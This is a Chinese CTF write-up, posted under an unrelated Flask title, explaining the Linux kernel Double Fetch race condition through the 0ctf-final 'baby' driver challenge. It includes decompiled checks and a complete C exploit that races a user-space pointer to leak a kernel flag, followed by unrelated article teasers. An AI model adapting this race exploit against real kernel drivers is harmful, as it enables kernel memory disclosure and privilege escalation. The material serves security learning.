Flask框架中常规漏洞防范方法

news2024/9/24 14:23:02

一、前言

Double Fetch是一种条件竞争类型的漏洞,其主要形成的原因是由于用户态与内核态之间的数据在进行交互时存在时间差,我们在先前的学习中有了解到内核在从用户态中获取数据时会使用函数copy_from_user,而如果要拷贝的数据过于复杂的话则内核会选择引用其指针而将数据暂存于用户态中等待后续处理,而在这时数据会存在被条件竞争修改原有数据的风险,也就是笔者要分享的Double Fetch的由来。

二、Double Fetch介绍

如下图所示,用户态首先准备好用户态数据(prepare data),然后执行syscall进入内核态后,会对用户态数据进行第一次fetch,这一次fetch主要是做一些检测工作(如缓冲区大小、指针是否可用等),在检查通过后会执行第二次fetch对数据进行实际操作。而在这期间是存在一定的时间差,如果我们在用户态数据通过第一次check以后创建一个恶意进程利用二次fetch之间的时间差修改掉原先用户态的数据,那么在内核执行第二次fetch时处理的就并非原先通过检测的数据,而是我们精心准备的恶意数据,而此类漏洞往往会引起访问越界,缓冲区溢出最终造成恶意提权的情况。

三、Double Fetch例题

1、题目分析

本次选择的例题是0ctf-final-baby,用IDA打开baby.ko进行逆向分析。驱动主要注册了baby_ioctl函数,当第二个参数为0x6666时会使用printk函数输出flag值在,可以通过dmesg命令查看printk函数的输出结果。

不难看出flag是硬编码在驱动文件中,可以看到flag的长度为33位。

.data:0000000000000480 flagdq offset aFlagThisWillBe.data:0000000000000480 ; DATA XREF: sub_25+25↑r.data:0000000000000480 ; sub_25+D6↑r ....data:0000000000000480 ; "flag{THIS_WILL_BE_YOUR_FLAG_1234}" 

当第二个参数为0x1337时通过三次检测则会对传入的内容与flag进行比较,如果相同就通过printk函数输出flag值。其中在三次检测中使用到_chk_range_not_ok函数,前两个参数不难理解,但是第三个参数在这里比较难理解。

bool __fastcall _chk_range_not_ok(__int64 contect, __int64 len, unsigned __int64 unknow){bool my_cf; // cfunsigned __int64 sum; // rdi​my_cf = __CFADD__(len, contect);sum = len + contect;return my_cf || unknow < sum;} 

我们通过动态调试的方式定位在_chk_range_not_ok函数处,发现current_task+0x1358的结果就是0x7ffffffffffff000,也就是说这三次check的意思分别是:

1、判断结构体的指针是否在用户态2、判断结构体中flag地址指针是否在用户态3、判断结构体中flag长度是否与内核flag长度相同 

通过这三个检测之后就会比对传入结构体中flag值与内核的flag值是否相同,全部正确就会通过printk输出内核中的flag值。

for ( i = 0; i < strlen(flag); ++i ){if ( contect->addr[i] != flag[i] )return 0x16LL;}printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);return 0LL; 

2、漏洞利用

通过分析题目其实没有十分明显的漏洞点,但是如果我们以条件竞争的思路来看待这道题就会发现隐藏的漏洞点。如果我们首先在用户态创建一个可以通过三次检测的结构体指针(User_Data),那么在这个数据在真正被处理之前是存在一定的时间差的,并且因为数据是保存在用户态中,所以当我们开启一个恶意进程不断修改用户态中flag地址为内核态的地址,那么在实际处理数据时取出的就是内核地址,最终判断的时候就是内核地址与内核地址的比较,最终输出flag值并用dmesg命令查看输出结果。

3、EXP

#include <string.h>#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <pthread.h>#include <fcntl.h>#include <sys/stat.h>#include <sys/types.h>#include <sys/ioctl.h>​int finish = 1;​struct message {char *addr;int len;}data;​size_t flag_address = 0;​void read_flag_address() {system("dmesg | grep flag > message.txt");int fd = open("message.txt", O_RDWR);char buf[0x60] = {0};​read(fd, buf, sizeof(buf));size_t idx = strstr(buf, "at ") + 3;sscanf(idx, "%llx", &flag_address);printf("[+] FIND FLAG ADDRESS: 0x%llx\n", flag_address);close(fd);}​void evil_thread() {while (finish == 1) {data.addr = flag_address;}}​void main() {pthread_t pthread;int fd = open("/dev/baby", O_RDWR);char buf[0x100] = {0};ioctl(fd, 0x6666);read_flag_address();​pthread_create(&pthread, NULL, evil_thread, NULL);​data.addr = buf;data.len = 33;​for (int i = 0; i < 0x1000; i++) {ioctl(fd, 0x1337, &data);data.addr = buf;}finish = 0;pthread_join(pthread, NULL);system("dmesg | grep flag");close(fd);} 

使用如下命令编译elf文件,重新打包文件系统后执行start.sh,最终效果如下。

gcc-pthread -g -static -masm=intel -o exp exp.c 

四、总结

Double Fetch 最为主要的就是培养以线程间条件竞争的角度来看待程序,从而发现一些比较隐蔽的漏洞。关于本次介绍的例题还有一种非预期的解法,可以通过在用户态使用mmap的方式开辟两块内存地址,第一块设置读写权限,第二块设置不可读写权限,我们将需要比较的字节放在第一块内存的最后一个字节中,当我们的判断正确时就会继续往下取值,这时就会从第二块即不可读写的内存中取值,就会造成kernel panic,这时我们就可以判断字符判断成功。感兴趣的师傅们可以自己尝试实现一下。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/140707.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

leetcode | 链表

01 链表知识点 1.1 基础知识 线性表&#xff1a;零个或多个相同类型的数据元素的有限序列&#xff0c;一对一关系&#xff0c;所含数据元素个数n称为线性表的长度。 线性表有两种物理结构(存储结构)&#xff1a;顺序存储、链式存储。 线性表的顺序存储结构&#xff1a;用一段…

优化改进YOLOv5算法之添加SE、CBAM、CA模块(超详细)

目录 1 SENet 1.1 SENet原理 1.2 SENet代码(Pytorch) 1.3 YOLOv5中加入SE模块 1.3.1 common.py配置 1.3.2 yolo.py配置 1.3.3 创建添加RepVGG模块的YOLOv5的yaml配置文件 2 CBAM 2.1 CBAM原理 2.2 CBAM代码(Pytorch) 2.3 YOLOv5中加入CBAM模块 2.3.1 common.py配…

敏捷是一种态度:有了敏捷建模,就有了敏捷需求

目 录01 缘起02 敏捷需求5W1H的思考‍‍‍‍‍‍03 关于敏捷需求体系的一些思考‍‍‍‍‍‍04 写在敏捷需求后的话01缘起对研发效能提升的研究&#xff0c;是近年来各家企业技术部门一直在研究的课题。早期&#xff0c;针对敏捷开发的实践&#xff0c;让大多技术管理者尝到…

114.(leaflet之家)leaflet空间判断-点与圆的空间关系

听老人家说:多看美女会长寿 地图之家总目录(订阅之前建议先查看该博客) 文章末尾处提供保证可运行完整代码包,运行如有问题,可“私信”博主。 效果如下所示: 下面献上完整代码,代码重要位置会做相应解释 <!DOCTYPE html> <html>

每个开发人员都应该使用的可扩展和可维护的 React 项目结构

一个好的项目结构可以在理解代码库、灵活性和维护方面对项目的成功产生巨大影响。结构和维护不当的项目很快就会变成一团糟和可怕的遗产&#xff0c;没有人愿意与之共事。我现在将向您展示我在项目中经常使用的结构&#xff0c;并解释其背后的原因。这种结构应该是大规模应用程…

开源代码 | FMCW-MIMO雷达仿真MATLAB

本文编辑&#xff1a;调皮哥的小助理 本程序来源&#xff1a;https://github.com/ekurtgl/FMCW-MIMO-Radar-Simulation&#xff0c;作者是阿拉巴马大学博士生艾库特格尔&#xff0c;研究方向主要是雷达信号处理人类活动识别以及雷达数据的机器学习应用&#xff0c;这份比较新的…

STM32MP157驱动开发——4G通信模块驱动

STM32MP157驱动开发——4G通信模块驱动一、简介二、驱动开发1.高新兴 ME3630 驱动开发驱动修改添加 ECM 支持程序配置 Linux 内核ppp拨号功能测试ECM 联网测试ME3630 4G 模块 GNSS 定位测试2.移远EC20 4G驱动开发驱动修改配置 Linux 内核EC20 ppp 拨号上网移远 GobiNET 驱动移植…

go语言学习(一):Mac环境安装及初始化

​ ​为什么要学习go语言? 1、简洁&#xff0c;快速&#xff0c;安全&#xff1b; ​ ​2、并行&#xff0c;有趣&#xff0c;开源​&#xff1b; 3、内存管理&#xff0c;数据安全&#xff0c;编译迅速 首先&#xff0c;去官网&#xff1a;https://golang.google.cn/dl…

面向对象3(多态、多态调用成员函数的特点、多态的优势和弊端及改进、包、final、权限修饰符、代码块、抽象方法和抽象类、接口、内部类)

1、多态 2、多态调用成员函数的特点 示例如下&#xff1a; 理解&#xff1a; 因为是Animal类型的&#xff0c;所以在输出name时会在父类继承下来的变量里面找 &#xff0c;没有就报错。而一般是先找自己再找父类继承下来的。 3、多态的优势和弊端及改进 优势&#xff1a; 弊端…

Arduino——野火GPS模块

GPS模块 文章目录GPS模块前言一、Arduino代码前言 手上还有一个GPS&#xff0c;用arduino做模块很方便&#xff0c;打算和短信模块结合&#xff0c;短信模块上次已经使用完成了&#xff0c;这次学习一下GPS模块 看模块很容易知道&#xff0c;这个模块用的是串口通信&#xff…

基于STM32智能家居控制系统软件设计及实现

1.1 系统流程图 智能家居控制系统的软件设计主要使用Keil uVision5进行STM32主烧录程序的编写&#xff0c;主程序完成的功能主要为接收并判断语音识别模块传过来的信息&#xff0c;然后根据满足条件的不同进行对应的操作。例如&#xff0c;当语音模块传过来的信息为“打开电视…

top详解--查看cpu及内存使用情况

top详解--查看cpu及内存使用情况 参考链接:http://t.zoukankan.com/guoyu1-p-12237660.html 一、top命令 top命令是Linux下常用的性能分析工具,能够实时显示系统中各个进程的资源占用状况,类似于Windows的任务管理器。 运行 top 命令后,CPU 使用状态会以全屏的方式显示,…

基于Java+SpringBoot+vue+element实现婚纱摄影网系统

基于JavaSpringBootvueelement实现婚纱摄影网系统 &#x1f345; 作者主页 超级帅帅吴 &#x1f345; 欢迎点赞 &#x1f44d; 收藏 ⭐留言 &#x1f4dd; &#x1f345; 文末获取源码联系方式 &#x1f4dd; 文章目录基于JavaSpringBootvueelement实现婚纱摄影网系统前言介绍&…

Flask中的后端并发思考(以Mysql:too many connections为例)

之前写过一篇《CentOS 下部署NginxGunicornSupervisor部署Flask项目》&#xff0c;最近对该工程的功能进行了完善&#xff0c;基本的功能单元测试也做了。觉得也是时候进行一下压力测试了&#xff0c;所以利用Jmeter对部署到服务器的项目进行了简单的压力测试。在之前的笔记中写…

10个 Python 高效编程小技巧

初识Python语言&#xff0c;觉得python满足了你上学时候对编程语言的所有要求。python语言的高效编程技巧让那些曾经苦逼学了四年c或者c的人&#xff0c;兴奋的不行不行的&#xff0c;终于解脱了。高级语言&#xff0c;如果做不到这样&#xff0c;还扯啥高级呢&#xff1f; 01…

【密码学】HMAC与HS256算法

哈希算法加盐 传统的哈希算法&#xff1a; digest hash(input)因为相同的输入会产生相同的输出&#xff0c;所以想要加盐&#xff0c;加盐的目的就在于&#xff0c;使输入有所变化&#xff1a; digest hash(salt input)这个salt可以看作是一个额外的“认证码”&#xff0…

ChatGPT 使用 API 进行 Postman 调用测试

当获得 ChatGPT 的 API Key 以后&#xff0c;想使用 Postman 来进行一下调用。调用的方法为 POST。需要设置几个参数。我们希望使用的 EndPoint 是&#xff1a;API EndPoint访问使用的 EndPoint 是&#xff1a;https://api.openai.com/v1/completions授权方法授权的方法使用的是…

FortiGate FGCP HA 配置文档

概述 FortiOS 提供 6 种冗余解决方案&#xff0c;工业标准的 VRRP 和 5 种专有的解决方案&#xff1a; FortiGate Cluster Protocol (FGCP) high availability&#xff0c;FortiGate Session Life Support Protocol (FGSP) high availability&#xff0c;Session-Aware Load …

Spring Cloud LoadBalancer(负载均衡)

简介 了解过Spring Cloud&#xff0c;就知道&#xff0c;之前Spring Cloud中默认的负载均衡组件为ribbon&#xff0c;ribbon是Netflix开源的组件&#xff0c;但是目前已经停止更新了。所以Spring官方推出了Spring Cloud LoadBalancer。而且Spring Cloud LoadBalancer是目前唯一…

win11下通过qemu 安装win10 arm系统

安装qemu QEMU for Windows – Installers (64 bit) 我选了最新的20221230的版本&#xff0c;我将其安装在c:\qemu7\下&#xff0c;另外在环境变量中加入这个路径 然后在别的盘上建立一个路径&#xff0c;名称随意&#xff0c;不要有中文和空格即可&#xff0c;我放在了e:\qe…